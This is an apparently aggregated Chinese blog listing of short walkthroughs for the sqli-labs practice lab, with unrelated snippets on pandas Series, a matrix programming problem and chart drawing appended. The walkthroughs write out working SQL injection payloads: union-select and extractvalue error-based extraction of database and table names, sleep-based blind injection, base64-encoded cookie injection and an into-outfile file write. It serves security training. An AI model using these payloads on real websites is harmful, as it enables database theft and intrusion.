SQLI DUMB SERIES-6】的更多相关文章

(1)无论怎么输入username,都没有回显.尝试改变password的输入.找到了闭合方式:单引号 (2)报错注入: 爆库名 admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database())))and '# 爆表名: uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from inf…
(1)检测构造方式 由此看出输入的用户名以及密码都被一对单引号所包含. 方法一: (2) 模拟真实环境,以用户的身份登录. (3)用burp抓包.开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater. (4)打开burp的repeater页面,修改post参数,测试是否存在报错注入. 说明存在报错型注入. (5)可用extractvalue(目标xml文档,搜索路径)进行攻击. 爆库名(库名前用‘~’进行区别) uname=admin' and extrac…
(1)根据题目知道此处是双引号注入,其余的与上一关相同. 登录成功后,用burp抓包,再刷新浏览器页面.寻找闭合方式: 闭合方式果然为双引号. (2)其payload与21关相同,需要对payload进行based64编码,同时将闭合方式改变即可. 例如: admin1" and extractvalue(1,concat(0x7e,(select database())))# 编码: YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2V…
Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) (1)登录成功后有以下页面: 其中红圈内的字符为admin的BASED64编码后的字符. (2)用burp抓包,再刷新浏览器. 寻找闭合方式:明文:admin' --+ based64编码:YWRtaW4nICAtLSs= 闭合方式为' ) (3)开始报错注入,需要将payload用based63编码输入.例如:爆表名 admin') and extrac…
(1)登录成功后页面: (2)登录成功后,用burp开始抓包,刷新浏览器页面,将会跳出如下页面 (3)根据各种提示,知道需要从cookies入手,寻找闭合方式 闭合方式为单引号.注释符也可以用 (4)开始注入:可用报错注入,方法同前面的一样,例如:爆库名 uname=admin1' and extractvalue(1,concat(0x7e,(select database()),0x7e))#…
(1)根据题意,从Referer入手 (2)报错注入与上一关相同.如爆库名: 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '…
(1)对username和password无论怎么输入,都没有回显,再看题目,POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)提示从user-agent入手,尝试 闭合方式为单引号. (2)有回显则可用报错型注入,例如爆库名.其余与前面的报错注入相同 'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '…
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15.…
(1)无论输入什么都没有回显,但是输入 admin'# 时会显示成功登录,说明闭合方式是单引号 (2)无回显,则使用盲注,可用用时间延迟攻击法. 测试时间延迟是否可行: uname=admin' and sleep(5) #&passwd=&submit=Submit 有明显延迟,测试成功. (3)手工延迟注入与前面的手工注入相同,如爆库名 uname=admin' and if(length(database())=8,sleep(7),1)#&passwd=&submi…
(1)闭合方式为一对双引号 (2)可用报错注入.如: admin" and extractvalue(1,concat(0x7e,(select database()))) and " 其余报错注入方式于12关相同.…
(1)检测闭合方式 通过 ') 闭合. (2)尝试输入 admin')# 无回显.尝试报错注入, 爆表payload: admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名 爆users表的列 其他均与12关相同.…
(1)检测闭合方式:在username上输入" admin" " 说明输入的username后还有双引号和括号 方法一: (2)通过其他途径知道用户名即可.如 输入" admin")# " 方法二: (3)构造即可闭合又可报错的语句,在username处输入 爆库payload: admin" and extractvalue(1,concat(0x7e,(select database()))) and " 爆表名paylo…
第五关.第八关以及第九关.第十关都是使用盲注,除了第五关说的双注入外,也可使用时间注入法 (1)无论输入啥,都回显相同 (2) ?id=1' and sleep(3) --+ 发现有明显延迟,说明可以使用时间注入, ?id=1' and if(length(database())=8 , sleep(5), 1) --+ 从1尝试到8发现有明显延迟,说明数据库名为八位 (3)同样的爆库名 ?id=1' and if(left(database(),1)='s' , sleep(5), 1) --…
(1)在id后加单引号.无回显,加双引号跟正常输入是一样的回显,既然不会回显出错信息,只能进行盲注. (2)盲注的方法同less5…
(1)查看PHP源代码 可以看见输入的id被一对单引号和两对圆括号包围 (2)根据提示:Dump into Outfile可知,此次攻击需要导出文件 (3)在第一关获取 @@datadir 读取数据库路径@@basedir MYSQL 获取安装路径 ?id=2' union select 1,@@datadir,@@basedir --+ (4)修改MySql配置,以让能在D盘写入文件(MySQL->my.ini) (5)payload如下 ?id=1')) union select 1,'2'…
less6 输入 ?id=1" 说明双引号未被过滤,输入的id被一对双引号所包围,存在注入点,可以闭合双引号. 而输入正常时 情况和less5相同,因此注入同less5.…
less5 (1)输入单引号,回显错误,说明存在注入点.输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了:可以使用报错注入,有两种方式 (3)双注入查询 参考资料:http://www.2cto.com/article/201303/192718.html 简单的说,使用聚合函数进行双注入查询时,会在错误信息中显示一部分错误信息,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来. 1)爆数据库名 ?id…
less4 输入单引号发现回显正常,说明单引号被过滤了,输入双引号: ?id=1" 说明输入的Id被一对双引号和圆括号包围,因此闭合双引号和圆括号就行,其他方法跟less1差不多 例如:union查询表名 ?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%23…
less3 输入?id=1' 说明输入的id旁边加了单引号和括号('id'),直接在1后面加入“ ') ”,闭合前面的单引号和括号. 方法同less1相同. 例如:查询PHP版本和数据库名字 ?id=1') union select 1,version(),database() %23…
less2 同Less1相同,存在注入点 输入 ?id=1' 说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号 (1)爆字段 ?id=1 order by 4 字段为3. (2)用union联合查询 ?id=-1 union select 1,version(),database() Php版本为5.5.53,数据库名字为security. (3)爆表 ?id=-1 union select 1,group_concat(table_name),3 from information_…
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http: 结果: http: 结果: 现在可知,“ ' ”并没有被过滤,因此可以进行以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=1%23 结果:回显正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27%20and%201=2%23 结果:回显失败 由此可见,…
SQLi Lab 系列的文字和视频(需要FQ),讲解的很好 SQLi Lab Series - Introduction SQLi Lab Series - Error Based SQLi Lab Series - Double Query / SubQuery SQLi Lab Series - Blind Injection - Boolean Based SQLi Lab Series - Blind Injection - Time Based SQLi Lab Series - Us…
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试一试) Less-1: 提示参数是id,值为数字. 先测试是字符型还是字符串型: ?id=1 and 1=2--%20 ?id=1' and 1=2--%20 结果证明是字符串型. 然后一系列常规操作,order by 3为上限. payload: ?id=100' union select 1,u…
一.reindex() 方法:重新索引 针对 Series   重新索引指的是根据index参数重新进行排序. 如果传入的索引值在数据里不存在,则不会报错,而是添加缺失值的新行. 不想用缺失值,可以用 fill_value 参数指定填充值. 例如:   fill_value 会让所有的缺失值都填充为同一个值,如果不想这样而是用相邻的元素(左或者右)的值填充,则可以用 method 参数,可选的参数值为 ffill 和 bfill,分别为用前值填充和用后值填充: 针对 DataFrame   重新…
一.pandas 是什么 pandas 是基于 NumPy 的一个 Python 数据分析包,主要目的是为了数据分析.它提供了大量高级的数据结构和对数据处理的方法. pandas 有两个主要的数据结构:Series 和 DataFrame. 二.Series Series 是一个一维数组对象 ,类似于 NumPy 的一维 array.它除了包含一组数据还包含一组索引,所以可以把它理解为一组带索引的数组. 将 Python 数组转换成 Series 对象: 将 Python 字典转换成 Serie…
前言 最早接触安全也是从xss攻击和sql注入攻击开始的. 和xss一样屡居OWASPtop10 前三名的漏洞,sqli(sql Injection)sql注入攻击也是web安全中影响较大和影响范围较广的漏洞之一. 0x01 原理介绍 sql注入攻击作为注入攻击的一种,不同于xss的html和js代码注入,sql注入攻击注入的sql语句,最终导致数据库执行了用户输入的sql语句,想要sql注入玩的好,要学好sql语句以及了解一些数据库的特性. 0x02 危害性 sql注入由于可以导致数据库直接执…
Series Series由一组数据及索引组成 索引 采用默认索引 data = pd.Series([4, 3, 2, 1]) 自定义索引 data = pd.Series([4, 3, 2, 1],index = ['a', 'b', 'c', 'd']) 通过索引取值 data['a'] data[['a', 'd']] 通过赋值修改索引 data.index = ['e', 'f', 'g', 'h'] name属性 data.name data.index.name 运算 布尔运算 d…
妈妈呀....这简直是目前死得最惨的一次. 贴题目: http://poj.org/problem?id=3233 Matrix Power Series Time Limit: 3000MS Memory Limit: 131072K Total Submissions: 19128 Accepted: 8068 Description Given a n × n matrix A and a positive integer k, find the sum S = A + A2 + A3 +…
code: <!DOCTYPE HTML> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>流量统计</title> <script type="text/javascript" src="/ads/static/js/jque…
http://blog.sina.com.cn/s/blog_621e24e20101cp64.html 为避免耽误不喜欢这种曲线图效果的亲们的时间,先看一下小DEMO效果图: 先简单说一下,从图中可以看到一个chart可以绘制多个ChartArea,每个ChartArea都可以绘制多条Series.ChartArea就是就是绘图区域,可以有多个ChartArea叠加在一起,series是画在ChartAarea上的,Series英文意思是"序列.连续",其实就是数据线,它可以是曲线.…